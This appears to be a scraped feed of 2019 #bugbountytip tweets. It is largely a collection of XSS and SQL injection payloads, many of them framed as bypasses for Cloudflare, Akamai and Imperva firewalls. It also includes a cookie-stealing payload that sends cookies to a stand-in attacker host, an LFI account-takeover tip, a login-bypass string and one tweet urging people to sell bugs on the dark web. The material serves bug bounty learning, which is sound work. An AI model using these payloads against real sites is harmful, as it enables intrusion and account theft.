/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-08-04 10:19:52
3 Exactly this 🕵️‍♂️ #WAF #BugBounty #BugBountyTip #infosec https://t.co/RPfTOEfvU9
Guilherme Keerok
@k33r0k


2019-08-04 01:29:45
1 XSS Cloudflare WAF bypass: <img%20id=%26%23x101;%20src=x%20onerror=%26%23x101;;alert`1`;> #bugBounty #bugbountytip
Ammar Amer
@cry__pto


2019-08-04 00:26:41
3 you can use thise tool to dynamically generate your own security (XSS,SQLI,email-format,etc,) payloads for fuzz testing: https://t.co/tONSfTriWq example: echo "<script>alert(1)</script>" | radamsa -n 5 --patterns od #bugbountytip #bugbounty #Hacking #pentest
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-08-03 21:58:27
0 SQL WAF-Fail2Ban Payload via dot 👾 (SELECT 6037 FROM(SELECT COUNT(*),CONCAT(0x7176706b71,(SELECT (ELT(6037=6037,1))),0x717a717671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) #WAF #BugBounty #BugBountyTip #infosec
Ammar Amer
@cry__pto


2019-08-03 21:02:35
1 you should not depend only on one tool to get the jobe done,you should always use 3 or 4 tools to make sure that you get the required/true results. thise apply to all hacking stages. like osint & scanning,,,etc. #bugbountytip #osint #Hacking
𝓚𝓮𝓷𝓪𝓷
@h1_kenan


2019-08-03 18:46:27
0 Gaining Shell using Server Side Template Injection (SSTI) by @davidvalles007 #bugbountytip https://t.co/07uhXW7Hza
SECARMY
@secarmyofficial


2019-08-03 18:40:30
1 😱Hurry Join Book Your Seats Now 💢For Web App Pentesting Training 🌀Tomorrow Is Last Day Sign up to below link🔗 https://t.co/9EPBgaPB5R #Hackers #HackerSummerCamp #HackLearning #bugbounty #bugbountytip #WebApp https://t.co/DBocFwUbUD
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-08-03 17:48:25
0 XSS { Cloudflare } bypass: 👾 <a+HREF='%26%237javascrip%26%239t:alert%26lpar;document.domain)'> #WAF #BugBounty #BugBountyTip #infosec
Random Robbie
@Random_Robbie


2019-08-03 13:18:26
6 #bugbountytip - Got a LFI on a php app.... Check for sessions at /var/lib/php/session Should be easy account takeover from there :D
expl0itc0der
@vanshitmalhotra


2019-08-03 09:49:14
0 Any script/one line command on aws cli to quickly get the list of permissions enabled for s3 bucket ? @awscloud #bugbounty #bugbountytip Command - aws s3api get-bucket-acl - - bucket bucketname
Ennio Campagna
@EnnioCamp


2019-08-03 06:34:31
0 New entry!! Time to #learn ! #bugbounty #bugbountytip https://t.co/ha26xRNaET
XRSI
@XRSIdotorg


2019-08-02 18:58:40
0 Trust, Privacy and Safety will define the success of XR Technologies. Thts why #XRSI is in conversations wth industry leaders to roll out a dedicated #XR #bugbounty program, so we stay ahead of the bad guys : https://t.co/jsB7Zd2Aop. #BugBountyTip #appsec #AR #VR @ReadyHackerOne https://t.co/esWcitsv16
Andri Wahyudi 🕊️ ‏
@andripwn


2019-08-02 18:39:19
0 How do I open a report that has been closed by @Hacker0x01 ? but, give an impact and a very clear explanation, to open your report and become Triaged #BugBounty #BugBountyTip
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-08-02 16:27:45
1 Network ~javascript execution payload: { <body onscroll=alert(1)><br><br><br><br><br><br>...<br><br><br><br><input autofocus> } #WAF #BugBounty #BugBountyTip #infosec
Detectify
@detectify


2019-08-02 15:11:43
2 New blog from Crowdsource hacker @gwendallecoguic: A tutorial on bypassing Cloudflare WAF with the origin server IP address. #bugbountytip https://t.co/HvSq0iBkk9

@pouyana1


2019-08-02 11:47:12
1 A bug on the printer and this is the result 😁: #BugBountyTip #bugbounty #hacking #hack https://t.co/pd2ekxbTkf
Petko D. Petkov
@pdp


2019-08-02 11:08:00
1 Devious bug bounty tip: setup your own bug bounty program on @Hacker0x01 with solid rewards. Monitor what other hackers are doing and reflect to your targets. Muhaha #bugbountytip
emir c a
@emirca_


2019-08-02 10:32:28
0 Should we test only websites which has vulnerability bounty programs or test every possible website as we can and inform the companies? #BugBountyTip #BugBounty
Malav Sharma (Wolfdroid)
@ShMalav


2019-08-02 04:32:57
1 #bugbountytip Some people made it quite early , some took a lot of time …. but eventually they all made it … Its just about your curiosity and hard work and most important keep doing it .. never leave the field
Mo'men Basel
@Momenbassel


2019-08-02 02:57:09
0 pyRobots: a tool that reads "robots.txt" file and appends each path to the domain/subdomain you entered. https://t.co/S8hs6cdXxF #bugbountytips #python #BugBounty #BugBountyTip https://t.co/yeLvkcCUeo
Pavandeep
@Pavandep8


2019-08-01 17:29:00
1 Look what I shared: Bypassing CORS - #Hacker #hackers #BugBountyTip #BugBounty @MIUI| https://t.co/Q8f8YDZhf5
𝓚𝓮𝓷𝓪𝓷
@h1_kenan


2019-08-01 16:00:56
8 I will show you the real impact of the #XSS #BugBountyTip #security when you find the reflection use payload: on[whatevereventworks]= "location=`http://attackersitecom/?`+cookie"> attackersite will get user cookies. this is how XSS works!
emir c a
@emirca_


2019-08-01 12:36:03
0 Searching for XSS vulnerabilities all day and night. Still couldn't find anything. Maybe looking the wrong place with wrong keys. #BugBounty #BugBountyTip
Bogdan Bodishtyanu
@xalerafera


2019-08-01 12:34:52
0 If you come across requests with the OPTIONS method, do not miss them. Try changing them to the GET method and try to find XSS and SQL injection vulnerabilities! Good luck for hunting. #BugBountyTip #Hacker0x01 #TogetherWeHitHarder https://t.co/8ZsBWwzJ3O
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-08-01 12:21:36
3 Another way to use throw without a semi-colon: 👾 <script /***/>~/***/confirm(´\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450´~)/***/</script /***/ #WAF #BugBounty #BugBountyTip #infosec
Imran Parray
@CreedHackers


2019-08-01 12:03:17
4 Steal it like you own it. #TIP: 1- Collect endpoints/parameters from the API request. 2- Make a Brute-force List . 3-Now use that list to recursively bruteforce all the API endpoint. #BugBountyTip #infosec #Cybersecurity @Bugcrowd https://t.co/HGqFYKSOQs
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-08-01 10:41:54
1 Unusual data load encrypted with Base64 can be useful when passing through a web firewall filter. 👾 <svg/onload=location=window[`atob`]`amF2YXNjcmlwdDphbGVydCgxKQ==`;//> #WAF #BugBounty #BugBountyTip #infosec
expl0itc0der
@vanshitmalhotra


2019-08-01 10:14:22
0 #BugBountyTip — Follow reddit/r/bugbounty ! Interesting #BugBounty writeups shared almost every day !
𝓚𝓮𝓷𝓪𝓷
@h1_kenan


2019-08-01 09:39:41
0 100 people did it wrong 😂 always try to play with token, sometimes server side, it isn't checked properly #BugBountyTip https://t.co/ouioxKziDq
Jason Sewell
@sewell_jason


2019-08-01 08:31:31
0 TFW you know you're in a #docker container. #pentesting #BugBountyTip https://t.co/SfA0p6ERZx
Ammar Amer
@cry__pto


2019-08-01 08:01:39
2 the best BugBounty books to read. consider them one book. real world bughunting:will learn you how to find bugs based on real world reports Bug Bounty Hunting Essentials;will learn you how to find bugs based on practical effective pentesting methods. #BugBountyTip #BugBounty https://t.co/3vZcTV80E8
SaadAhmed
@XSaadAhmedX


2019-08-01 07:02:26
7 Here Is the Write-up how I bypass the CORS to steal the victim account information 🧐🧐 https://t.co/Z95XcdIAKx #bugbountytip #bugbountytips #bugbounty @Bugcrowd

@pouyana1


2019-08-01 03:21:17
0 found a bug in microsoft outlook web app : everyone sends me an email, the mail won't deliver and he/she will automatically sign out after that 😂😂 will make a video for it soon #bugbounty #BugBountyTip #infosec #Microsoft #hack #hacking
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-08-01 00:13:26
1 XSS load has been found interesting but effective: " onclick=alert()//<button ' onclick=alert()//> */ alert()//<img style="background-url=eval(onclick)" onclick=alert()>//> #WAF #BugBounty #BugBountyTip #infosec https://t.co/gxXVGVvV3w
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-07-31 23:56:33
0 Interesting XSS For example, enter where Id = 123 is reflected in the JSON body inside the code label. ? If you send id = </ script>, the application will delete the entry. This,? Id ["</ script>"] = 123 can be skipped. #WAF #BugBounty #BugBountyTip #infosec #developer https://t.co/f3RMj0nTce
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-07-31 22:50:37
0 Xss using css: <style>img{background-image:url('javascript:alert(1)')}</style> Firewall bypass: <style>*{background-image:url('\6A\61\76\61\73\63\72\69\70\74\3A\61\6C\65\72\74\28\6C\6F\63\61\74\69\6F\6E\29')}</style> #WAF #BugBounty #BugBountyTip #infosec
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-07-31 21:06:47
1 @brutelogic { XSS } test results in successful payload bro. https://t.co/pFNM1awbI5</script><svg><script>alert(1337)%0A--> #payload #BugBounty #BugBountyTip #WAF
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-07-31 20:58:06
0 Another bypass DotDefender WAF 👾 <bleh/ondragstart=	parent	['open']	()%20draggable=True>dragme #WAF #BugBounty #BugBountyTip #infosec
Andri Wahyudi 🕊️ ‏
@andripwn


2019-07-31 20:35:20
1 Skip XSS filters with CloudFlare{}; 😊 <select><noembed></select><script x='[email protected]'a>y='[email protected]'//[email protected]%0a\u0061lert(1)</script x> #WAF #BugBounty #BugBountyTip
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-07-31 18:43:01
1 R.I.P. Fixed a chip with bypass cloud glare. 💉 but also jumps {cloudflare}: '"><iframe srcdoc='%26lt;script>;prompt${document.domain}%26lt;/script>'> #WAF #BugBounty #BugBountyTip #infosec #bypass #vulnerability #security #exploit
Mohammed Rishin
@mohd_rishin


2019-07-31 17:27:30
1 This bug allowed everyone to apply for #Google CEO's position . #Googlejob #HiringNow #hiring #LinkedIn #bug #bugbountytip #dataprivacy #jobseekers #job #fraud #marketing #business #entrepreneur #organization Read More: http: https://t.co/rlE7n7PnRi
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-07-31 16:25:38
0 Another { WAF CloudFlare bypass } that works on angle brackets and looks like it: It can work without an iframe. It's not fixed yet. 🕸️ xss'"><iframe srcdoc='%26lt;script>;alert(1)%26lt;/script>'> #WAF #BugBounty #BugBountyTip #infosec
Dhamu
@Dhamuharker


2019-07-31 15:53:21
0 #bugbountytips #BugBounty #bugbountytip #ItTakesACrowd #TogetherWeHitHarder If you are able to exploit Apache | Server Status try these things, you may end up getting the Server Status Access GET /server-status/common.htm https://t.co/GqiZVfFDgR
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-07-31 14:14:45
2 { ontouch * } handlers for mobile XSS 🧐 <body ontouchstart=alert(1)> <body ontouchend=alert(1)> <body ontouchmove=alert(1)> #WAF #BugBounty #BugBountyTip #infosec
BarMosseri
@MosseriBar


2019-07-31 14:02:16
0 Looking for someone to do with him bounty #bugbountytip
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-07-31 13:55:36
0 To include an image via url: Enter #payload: { https://x onerror=alert(1) }; #WAF #BugBounty #BugBountyTip #infosec https://t.co/8pKwE3FaIq
intigriti
@intigriti


2019-07-31 11:55:17
0 Tip of the day: check for exposed Slack tokens using @streaak's #BugBountyTip and find out if hackers could have been snooping on your Slack conversations. 👀 https://t.co/jh41qZJkgb
Petko D. Petkov
@pdp


2019-07-31 11:52:12
0 One of my critical issues (disclosure of credentials and API tokens) was just downgraded to Low because it affects non-prod environments. Obviously I disagree but such is life. $250 #bugbountytip
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-07-31 11:42:34
0 CloudFront XSS bypass: <--`<img%2fsrc%3d` onerror%3dalert(document.domain)> --!> #WAF #BugBounty #BugBountyTip
expl0itc0der
@vanshitmalhotra


2019-07-31 11:14:39
3 Faxploit: Breaking the Unthinkable https://t.co/I0erESpyd7 Follow Us for Cyber Security Trainings https://t.co/iNczOcGmCt #bugbounty #bugbountytip #penetrationtesting #pentesting #devops #devsecops #hacking
expl0itc0der
@vanshitmalhotra


2019-07-31 11:07:14
1 The Art of Man-in-the-Middle Attack https://t.co/XNvtS3duJ1 #bugBounty #bugbountytip #penetrationtesting #devops #devsecops #hacking #training #securitytraining #ceh
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-07-31 10:34:39
0 {xSS}; payload to ByPass CloudFlare protection. <body \< onscroll =1(_=prompt,_(String.fromCharCode(88,83,83,32,66,121,32,77,111,114,112,104,105,110,101)))> #WAF #BugBounty #BugBountyTip
max_shah_aqi
@aqibshah


2019-07-31 07:53:21
1 #Bugbountytip: To include an image via url: Enter #payload: https://x onerror=alert(1) #xss #BugBounty https://t.co/GGTm3PH1m1
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-07-31 07:50:24
2 Cloudflare #XSS #Bypass via dot 😎 "<BODY onload!#$%&()*~+-_.###:;[email protected][/|\]^`=alert(“XSS”)>" #WAF #BugBounty #BugBountyTip
Ammar Amer
@cry__pto


2019-07-30 23:45:02
2 html injection and content spoofing in the wild: -WITHIN SECURITY CONTENT SPOOFING: https://t.co/s7Xbpfrmgd -HACKERONE UNINTENDED HTML INCLUDE FIX BYPASS: https://t.co/lBF8pNKZP9 -THROUGH CHARACTER ENCODING: https://t.co/6W1u73x52P #bugbountytip #Hacking #Pentesting
m0z
@LooseSecurity


2019-07-30 23:34:54
1 #BugBounty #bugbountytip #bugbountytips #infosec Yes, CRLF injection "exists", but don't waste time on it. I see a lot of people trying to get header injection via CRLFs and it's really not going to happen... It's so rare these days. Your time is better spent on something else.
Navneet
@na5n33t


2019-07-30 19:26:07
1 Team adds the token parameter to avoid CSRF but forget to check even presence of token parameter is mandatory or not. 😅 I removed the token parameter and CSRF works as charm. 🙊Then look for other request and it also acts same 🙊 #bugbounty #bugbountytip #infosec
(((Gamliel)))
@Gamliel_InfoSec


2019-07-30 19:17:10
0 "Always go for the highest impact!" -Hussein Daher #bugbounty #bugbountytips #bugbountytip https://t.co/2O5NWuPVLu
Ashish Kunwar
@D0rkerDevil


2019-07-30 18:10:51
0 #bugbountytip: look into feedback forms and contact-us forms for smtp injection
SECARMY
@secarmyofficial


2019-07-30 17:17:26
0 Check out our Introduction to Our Bug Bounty Course Watch on Youtube Now https://t.co/EQPAUJUJ8c #wearesecarmy #bugbounty #bugbountytip #hacking #training #infosec https://t.co/NJgwu5upbH
Ammar Amer
@cry__pto


2019-07-30 14:58:00
1 new articles as a pdf files has been uploaded to my github. repository,the number of articles will continue to get higher until it reach 2000 articles as a pdf files the path to new articles https://t.co/gtsrUpWfF6 #bugbountytip #BugBounty #OSINT #Hacking #PenTest #CyberSecurity https://t.co/U4YyF3zRqa
miraitowa
@miraitowa1


2019-07-30 12:45:07
0 Thank you very much for sharing. I look forward to your next [email protected] #BugBounty #bugbountytip Live Bug Bounty Recon Session on Yahoo (Part 1 - 7/14/2019) https://t.co/0DbMDbOSHR via
miraitowa
@miraitowa1


2019-07-30 11:18:18
8 SSRF Trick: SSRF/XSPA in Microsoft’s Bing Webmaster Central by Elber Andre #bugbounty #bugbountytip #SSRF https://t.co/WDDlxRSUh2
Deepak Holani
@w_hat_boy


2019-07-30 07:58:38
0 #bugbountytip : Sometime when u come across for specific features but for that u have to pay just go on Google images type company name .. some people put images that that contain end point url which is not under demo feature ..but contain in full specific fetaures
mAshraf
@mAshraf9_


2019-07-30 07:54:07
0 As long as it is a program, a bug may appear. #infosec #BugBounty #bugbountytip #bugbountytips
RHack
@Queseguridad


2019-07-29 23:11:58
0 Akamai Bypass "><marquee%20loop=1%20width=0%20ontoggle=confirm=prompt`${1}`> Imperva Bypass "><details%20open%20ontoggle=confirm(1)> #bugbountytip #bugbountytips #akamaibypass #impervabypass
Jagannath
@SecurityBoy0x01


2019-07-29 15:22:32
0 Spawning a shell : https://t.co/yDo6mISHKt #infosec #bugbountytip #cybersecurity
Jagannath
@SecurityBoy0x01


2019-07-29 15:06:26
1 As I learn about PCI-DSS, I am collating the notes as I go. Here are they if you are interested. https://t.co/QayaJkJVDZ #PCI_DSS #infosec #dataprivacy #bugbountytip
Wh11teW0lf
@Wh11teW0lf


2019-07-29 13:33:36
0 #BugBounty #bugbountytip #bugbountytips # Don't forget for console.log() if alert()/confirm()/prompt() are blocking!
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-07-29 10:58:18
0 Skip XSS filters with CloudFlare{}; 😊 <select><noembed></select><script x='[email protected]'a>y='[email protected]'//[email protected]%0a\u0061lert(1)</script x> #WAF #BugBounty #BugBountyTip
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-07-29 07:50:42
0 (&& = %26%26) sql injection "and" filter bypass %26%26 1=1 #WAF #BugBounty #BugBountyTip #injection #Bypass
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-07-28 23:39:07
1 Chrome XSS byPass: %00%00%00%00%00%00%00<script%20src=(link: https://t.co/Tek0Fh9NMv) https://t.co/Tek0Fh9NMv ></script> #WAF #BugBounty #BugBountyTip
Sul will be at BlackHat
@pwnb0xes


2019-07-28 23:22:54
0 If a company isn't paying enough for your bug bounty take it to the dark web to get paid! #HIPHOPMUSIC #infosec #bugbountytip #getpaid
Aziz Hakim🇧🇩
@hackerb0y_


2019-07-28 21:18:20
0 While hunting a program I got an admin panel sub, eg: https://t.co/2iAH1i18kT Tried many way to bypass but couldn't succeed! Then entered main program's login info and clicked into login! Guess what? It took me to Admin Panel 🤙 #infosec #bugbountytip #BbWorld19 #bugbounty
MrB0LTv2 (தமிழன்)
@MrB0LTv2


2019-07-28 15:15:39
0 A little reward to a lazy guy for his lazy progress.!!😅 Hopefully, Rewards crossed 1st 1000€!!😋 Thnks @YogoshaOfficial 😍 #bugbountytip = Some things will take time!! And Patience matters..!! #bugbounty #We ❤️ #தமிழன் https://t.co/Bk2UeLp5eX
baluz
@haknfuk


2019-07-28 14:51:23
0 @MrB0LTv2 i lik that #bugbountytip
MrB0LTv2 (தமிழன்)
@MrB0LTv2


2019-07-28 14:44:23
0 A little reward to a lazy guy for his lazy progress.!!😅 Hopefully, Rewards crossed First 1000€ Euros!!😋 Thanks to all my well-wishers😍 and yogosha.official 😍 #bugbountytip = Some things will take time!! And… https://t.co/iKQCiQ4wxy
Demolalagos🌍
@Demolalagos1


2019-07-28 14:44:05
0 #bugbountytip If wappalyzer is showing the latest angular version of the site don't think of not getting xss bypass , I used angular xss payload v 1.3.2 on a website using angular js v1.6.4 . Developers does makes mistakes... Hope you like the tip. Happy hacking
Ammar Amer
@cry__pto


2019-07-28 11:44:40
2 when you see a Registration page, during a web pentesting operation you should try discover if you can enumerate usernames by trying to register with an existing username. #bugbountytip #BugBounty
Navneet
@na5n33t


2019-07-28 07:59:50
0 The website is protecting the CSRF by checking the Referer header and then this bypass helps. Successfully bypassed and submitted. Let's hope for the bounty. 😄😅 #bugbounty #bugbountytip #infosec “[Critical] Bypass CSRF protection on IBM” by Mohamed Sayed https://t.co/ZOB0m0odX5
Malav Sharma (Wolfdroid)
@ShMalav


2019-07-28 04:46:13
0 #bugbountytip trust me if it's that easy, everybody would be doing it .
Minture
@minturebr


2019-07-28 01:12:59
0 Use tweetdeck to keep an eye on new writeup, tweets, posts. #bugbountytip #bugbountytips #hacking
m0z
@LooseSecurity


2019-07-28 01:02:19
4 #bugbountytip #bugbountytips #infosec #infosecurity Instead of always using <img src=x onerror=alert(0)> why not try: <audio src=x onerror=alert(0)> <video src=x onerror=alert(0)> Or my favorite: <script src=x onerror=alert(0)>
Malav Sharma (Wolfdroid)
@ShMalav


2019-07-27 15:42:19
0 #bugbountytip If wappalyzer is showing the latest angular version of the site don't think of not getting xss bypass , I used angular xss payload v 1.3.2 on a website using angular js v1.6.4 . Developers does makes mistakes... Hope you like the tip. Happy hacking
Romansh yadav
@Romanshyadav


2019-07-27 14:10:28
8 Think better!. Book your pass for @bsidesahmedabad on early bird discount now. Pass link: https://t.co/psZDqWoxSt cc: @SecurityBSides @niksthehacker @dipenwadhwa @H4ck3rVishal @InfosecVandana @emgeekboy #conference #workshop #Hackers #bugbountytip #researcher https://t.co/adotzHI76s
Max
@0xw2w


2019-07-27 12:59:31
0 Tip: If you have an API endpoint like /api/v2/****/, try to substitute v* with a less number and look at the reaction. Maybe there is an IDOR or improper auth bug #bugbountytip
JR0ch17
@JR0ch17


2019-07-27 06:26:58
1 #bugbountytip for me tonight is always check if I have an upstream proxy server configured in Burp😅
vavkamil
@vavkamil


2019-07-26 18:10:51
0 XSSwagger v0.1 for detecting old Swagger UI versions vulnerable to XSS attacks #bugbounty #bugbountytip https://t.co/1sKKF9Jusn
Petko D. Petkov
@pdp


2019-07-26 17:42:11
2 Everyone is looking for XSS, SQLI, RCE and SSRF. You might get lucky but you are competing with the world. To be successful at bug bounty hunting one should look for those things no one else is looking for, which may seem harder but actually not hard at all. #bugbountytip
mAshraf
@mAshraf9_


2019-07-26 15:00:47
1 When they say the greatest vulnerability in a SDLC is human beings, they mean there will always be a bug there.😋😋 #infosec #BugBounty #bughunter #bugbountytip
bl4ckh4ck5
@bl4ckh4ck5


2019-07-26 12:46:05
0 @intigriti i shortly ago repported a clickjacking as high because it led to sensitive data exposure. just make the transparacy of the iframe very low and let him steal his own information using ctrl+a and ctrl+c and place that in a sepret input field. make it as a game ;) #bugbountytip
SecuNinja
@secuninja


2019-07-26 11:38:25
0 when <svg/onload=alert(1)> is not working, try without forward slash and add a whitespace <svg onload=alert(1)> #bugbountytip
Dhamu
@Dhamuharker


2019-07-26 11:02:24
0 Oracle WebLogic Server Remote Command Execution #bugbountytips #exploits #webappsec #BugBounty #bugbountytip #ItTakesACrowd #togetherwehitharder https://t.co/Vx9MVr0olN
Yatin Sharma
@Iam_yatin


2019-07-26 07:26:03
0 Seats are filling so fast. Don't wait ! Grab your @bsidesahmedabad seat now on early bird discount. https://t.co/UWTb7gRxXJ #Conference #workshops #Hacker #bugbountytip #researchers CC: @SecurityBSides @niksthehacker @H4ck3rVishal @dipenwadhwa https://t.co/AID3v5Thnx
Romansh yadav
@Romanshyadav


2019-07-26 06:55:03
1 Seats are filling so fast. Don't wait ! Grab your @bsidesahmedabad seat now on early bird discount. https://t.co/psZDqWoxSt #Conference #workshops #Hacker #bugbountytip #researchers CC: @SecurityBSides @niksthehacker @H4ck3rVishal @dipenwadhwa https://t.co/YUj5U0dvxd
m0z
@LooseSecurity


2019-07-25 15:53:43
0 #BugBounty #bugbountytip #bugbountytips #infosec I think it's worth replacing alert(0) in all your payloads with prompt `0` as it's an easy way to increase the probability of getting a successful #XSS vulnerability!
{{ '127.0.0.1’}}
@shivam31200


2019-07-25 15:36:32
0 So here <script> alert(1)</script> was popping 1 after trying to steal cookie via this <script> alert(document.cookie)</script> Not working :/ Final payload: <script> alert(1)</script> <script> alert(document.cookie)</script> It will popup user cookie #bugbountytip noobtip
Michele Romano
@Mik317_


2019-07-25 14:04:13
0 TIP: If you don't like small scopes, explore also `out-of-scope` subdomains ... you could find juicy endpoints containing CRLF/XSSI issues, that can be used to achieve a concrete impact also on the main domain :) #bugbountytip #BugBounty #bugbountytips (last one: now)
vavkamil
@vavkamil


2019-07-25 11:09:04
1 XSS ontouch* for mobile #bugbountytip https://t.co/WWyNp0FtYu
Petko D. Petkov
@pdp


2019-07-25 07:17:36
0 Reported vulnerability which allows me to takeover corporate accounts, access email and so on - flagged as informative. You are amateurs. #bugbountytip
h3rm17w0lf
@h3rm17w0lf


2019-07-25 05:15:17
0 Every came across a bug that made you sleepless until you exploited it ? I am working on one such and haven’t had a good sleep since two nights. #BugBounty #bugbountytip
Sarvagya Sagar
@0ffensivemitthu


2019-07-25 00:48:57
0 [ #bugbounty #bugbountytip ] - Oauth Hacks 💰 RFC6819 : https://t.co/8NNpx9sqgN Video : https://t.co/t7oarM6fc6 Writeup : https://t.co/que1GGgBK7 or https://t.co/cIRzuyGO7k or https://t.co/tvwk5MPhSq Cheatsheet : https://t.co/KZxpCODZ3L
plenum 🇹🇳
@plenumlab


2019-07-25 00:14:25
1 #bugbountytip when looking for priv esc read the api docs jump to old versions look for interesting calls and watch out for deprecated api endpoints sometimes they continue to use them for backward compatibility. Some functions like invite, join, create, delete... #BugBounty
Ammar Amer
@cry__pto


2019-07-24 22:30:49
1 you can use the fragments plugin in the WebScarab proxy. to identify the comments in the html source code which may contain useful/sensitve info for the pentester,an easy&fast way to search through the entire source code and find comments. #bugbountytip
pi0wlz
@pi0wlz


2019-07-24 17:29:37
0 if u use gobuster tool for dns enumuration like $ gobuster dns -d https://t.co/ixNnyR6gG7 -t 100 -w common-names.txt -o gobuster-findings, u can parse the output with $ cat gobuster-findings | sed 's/Found: //' > filter.txt #bugbountytip
BarMosseri
@MosseriBar


2019-07-24 14:36:58
0 When you got xss on Hyatt service :) #bugbountytip https://t.co/1oFu9K2Yyr
m0z
@LooseSecurity


2019-07-24 13:47:10
4 One of my favorite #XSS payloads of ALL TIME!!! <input/onfocus=alert(0) autofocus> Perfect for injecting inside of input tags, abusing the 'autofocus' attribute by combining it to an 'onfocus' event handler. #BugBounty #bugbountytip #bugbountytips #infosec #infosecurity
Pedro Henrique Cardoso
@G4L1C


2019-07-24 12:54:07
1 If a sqli target has magic quotes enabled you can avoid this by converting the string to Hex or Char. Example: load_file('/etc/passwd') = load_file(0x2f6574632f706173737764) Or load_file(chars(n1,n2,n2 [...])) #bugbounty #bugbountytip #bugbountytips #sqli
Alin Ciocoiu
@17Akun


2019-07-24 06:24:54
0 Hi. What note taking tools do you use for your projects? Cloud/non- cloud, but free. #pentest #pentesting #bugbountytip #bugbountytips
mayur gupta
@rootmayur


2019-07-24 04:51:13
0 I got 300$ for my submission💰💰 https://t.co/5BcAOrTsHP #bugbountytip #bugcrod #ethicalhacking
Sarvagya Sagar
@0ffensivemitthu


2019-07-24 02:12:32
1 [ What I Learned Today : 03 ] #BugBounty #bugbountytip Indepth Bug Bounty Guide : https://t.co/e89Kne5bWf 💰 Well written blog post by @officialpranj . For Newbies in Infosec - I recommend to read this blog post , twice in a week . ~ Thread : #0xWilt : @0xWilt
Sarvagya Sagar
@0ffensivemitthu


2019-07-24 01:47:14
1 [ #Motivation #bugbounty #bugbountytip #infosec ] No one can spoonfeed you everything You have to do itself You have to be Self learner or Independent learner If you’ve lack of motivation to learn then your infosec career is end here Bcz You’re not going to get far in Infosec
Petko D. Petkov
@pdp


2019-07-23 22:12:59
0 Sometimes it will take 9 months to get your bugs triaged #bugbountytip
Learning Appsec
@learningappsec


2019-07-23 19:00:14
1 Enumerated all the live urls ? next what ? Open all of them at once in your browser using https://t.co/HDt8VcPYSm #bugbountytip #bugbounty #AppSec
Petko D. Petkov
@pdp


2019-07-23 17:52:06
0 Competition is for the suckers #bugbountytip
Proxy
@LinuxKodachi


2019-07-23 17:06:59
0 Want to test your programming and problem solving skills? Here we go : {🕷} https://t.co/QXNsAcMuSL #Developer #programmers #bugbountytip
Pascal S
@PascalSec


2019-07-23 15:04:32
0 #BugBountyTip: If you use an automated Github secret scanner, make also sure to automate the GIT clone URL retrieval. Just created a GIST for that -> https://t.co/TPI4reVPZ1 Let me know if this is helpful and RT 😎
Sarvagya Sagar
@0ffensivemitthu


2019-07-23 14:05:18
2 Hey Guys, Join me and many other infosec asiprants in this group named Nullcrowd - https://t.co/ahMK4OPqkP , The best infosec community. #BugBounty #bugbountytips #bugbountytip #infosec #infosec19 #hacking #programming #programminglife #cybersecurity
d4d
@d4d89704243


2019-07-23 11:47:46
0 Check my new exploit for #image #processing library. This time it is GraphicsMagick https://t.co/OmYiOr2d27 #exploit #bugbountytip #bugbounty
Petko D. Petkov
@pdp


2019-07-23 11:28:24
0 Out of scope bugs are worth reporting - if nothing else you are making a good impression #bugbountytip
midhun
@Midhunryann


2019-07-23 11:24:58
1 @Hacker0x01 bug type :ssrf.. Program :private reward : 300usd First reward #infosec #newbie #bugbounty #bugbountytip https://t.co/KwcO4IP9m6
Sarvagya Sagar
@0ffensivemitthu


2019-07-23 02:02:12
2 [ What I Learned Today : 02 ] #BugBounty #bugbountytip #infosec #bugbountytips How does the internet works : Amazing whitepaper : ~ https://t.co/X3hEqNOUKD 💰 I recommend everyone to read this because this is building block for Infosec 🌈 ~ Thread : #0xWilt
Ameen
@ameenmaali


2019-07-22 22:42:30
0 #bugbountytip: (IDORs) if an endpoints accepts a list of IDs and you get unauthorized for [‘invalidId’] - try [‘validId’, ‘invalidId’]. It’s very possible the validation only occurs on the first element or if any element is valid. Seen it many times
Rubyfu
@Rubyfu


2019-07-22 21:36:20
1 Do you want to bypass Regex based filters? Use regexp-examples gem. It generates a list of all* strings that will match the given regular expression. https://t.co/H42YQhF9na #Rubyfu #OWASP #Pentest #XSS #bugbountytip
bugbountylab
@artofbugbounty


2019-07-22 14:56:43
0 Good references for bounty hunters #OffSec Advanced Web Attacks and Exploitation Resources https://t.co/8zMAn4vtPG #OSWE #bugbountytips #bugbountytip https://t.co/1dMqzPXZij
expl0itc0der
@vanshitmalhotra


2019-07-22 13:07:13
1 A3 - Sensitive Data Exposure OWASP Juice Shop Tutorial - Exploiting Forgot Password #bugbountytip #BugBounty Video Link : https://t.co/wr92be0wXa
Brute Logic
@brutelogic


2019-07-22 12:52:30
4 Use a Microsoft browser like IE11 or Edge. They behave like Burp and curl. #XSS #bugbountytip 😉 https://t.co/xSWgm3EchU
Mohammed Shine
@MohammedShine8


2019-07-22 12:42:29
0 #sqli with no quotes Username: \ Password:||1# #bugbounty #bugbountytip
